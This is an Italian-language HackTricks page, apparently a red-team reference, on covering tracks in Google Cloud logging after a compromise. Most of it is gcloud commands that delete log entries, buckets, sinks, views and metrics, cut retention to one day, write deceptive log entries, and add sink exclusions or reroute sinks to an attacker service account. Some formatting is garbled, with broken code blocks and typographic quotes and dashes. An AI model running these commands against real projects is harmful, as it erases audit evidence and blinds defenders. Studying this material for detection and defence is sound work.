GCP - Logging Post Exploitation

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Informazioni di base

Per maggiori informazioni consulta:

GCP - Logging Enum

Per altri modi per interrompere il monitoraggio consulta:

GCP - Monitoring Post Exploitation

Default Logging

Per impostazione predefinita non verrai scoperto semplicemente per aver eseguito azioni di sola lettura. Per maggiori informazioni consulta la sezione Logging Enum.

Aggiungi principal escluso

In https://console.cloud.google.com/iam-admin/audit/allservices and https://console.cloud.google.com/iam-admin/audit è possibile aggiungere principal per evitare la generazione di log. Un attaccante potrebbe abusarne per evitare di essere scoperto.

Leggere i log - logging.logEntries.list

Leggi le voci di log ```bash # Read logs gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

Everything from a timestamp

gcloud logging read “timestamp >= "2023-01-01T00:00:00Z"” –limit=10 –format=json

Use these options to indicate a different bucket or view to use: –bucket=_Required –view=_Default

</details>

### `logging.logs.delete`

<details>

<summary>Elimina voci di log</summary>
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>

Scrivere log - logging.logEntries.create

Scrivere una voce di log ```bash # Write a log entry to try to disrupt some system gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR ```

logging.buckets.update

Aggiorna la durata di conservazione del bucket dei log ```bash # Set retention period to 1 day (_Required has a fixed one of 400days)

gcloud logging buckets update bucketlog –location= –description=“New description” –retention-days=1

</details>

### `logging.buckets.delete`

<details>

<summary>Elimina bucket di log</summary>
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>

logging.links.delete

Elimina link del log ```bash # Delete link gcloud logging links delete --bucket --location ```

logging.views.delete

Elimina logging view ```bash # Delete a logging view to remove access to anyone using it gcloud logging views delete --bucket= --location=global ```

logging.views.update

Aggiorna la view di logging per nascondere i dati ```bash # Update a logging view to hide data gcloud logging views update --log-filter="resource.type=gce_instance" --bucket= --location=global --description="New description for the log view" ```

logging.logMetrics.update

Aggiorna metriche basate sui log ```bash # Update log based metrics - logging.logMetrics.update gcloud logging metrics update --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID ```

logging.logMetrics.delete

Eliminare metriche basate sui log ```bash # Delete log based metrics - logging.logMetrics.delete gcloud logging metrics delete ```

logging.sinks.delete

Elimina log sink ```bash # Delete sink - logging.sinks.delete gcloud logging sinks delete ```

logging.sinks.update

Aggiorna/interrompi sink di log ```bash # Disable sink - logging.sinks.update gcloud logging sinks update --disabled

Createa filter to exclude attackers logs - logging.sinks.update

gcloud logging sinks update SINK_NAME –add-exclusion=“name=exclude-info-logs,filter=severity<INFO”

Change where the sink is storing the data - logging.sinks.update

gcloud logging sinks update new-destination

Change the service account to one withuot permissions to write in the destination - logging.sinks.update

gcloud logging sinks update SINK_NAME –custom-writer-identity=attacker-service-account-email –project=PROJECT_ID

Remove explusions to try to overload with logs - logging.sinks.update

gcloud logging sinks update SINK_NAME –clear-exclusions

If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update

gcloud logging sinks update SINK_NAME –use-partitioned-tables gcloud logging sinks update SINK_NAME –no-use-partitioned-tables

</details>

> [!TIP]
> Impara e pratica il hacking AWS:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Impara e pratica il hacking GCP: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Impara e pratica il hacking Azure: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Supporta HackTricks</summary>
>
> - Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
> - **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
>
> </details>